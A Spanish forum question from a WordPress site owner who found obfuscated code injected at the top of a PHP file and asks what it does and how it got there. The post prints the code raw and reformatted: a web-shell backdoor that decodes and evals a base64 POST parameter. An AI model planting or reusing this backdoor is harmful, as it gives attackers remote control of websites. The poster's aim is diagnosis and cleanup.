Mi sitio está construido con Wordpress. Un día dejó de funcionar y encontró un error en un archivo PHP.
Cuando descargué ese archivo PHP para ver qué sucedió, mi antivirus (Microsoft Security Essentials) lo detectó como una amenaza y eliminó el archivo descargado.
Afortunadamente, puedo acceder a cPanel de mi hosting y editar el archivo PHP problemático desde allí.
Encontré que al principio del código se adjunta algún código inusual. (Borre el código y todo funciona bien, por ahora)
Aquí está el código:
<?php $lro89 = "t_cepodas6b4";$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]); if (isset (${$scs1 }[ 'n3d9ebc' ])) {eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;}?>
Reformateado para facilitar la lectura:
<?php
$lro89 = "t_cepodas6b4";
$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);
$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]);
if (isset (${$scs1 }[ 'n3d9ebc' ])) {
eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;
}
?>
Tengo algunas preguntas:
- ¿Qué hace el código?
- ¿Significa que hay un virus?
- ¿Cómo se puede inyectar solo en este archivo?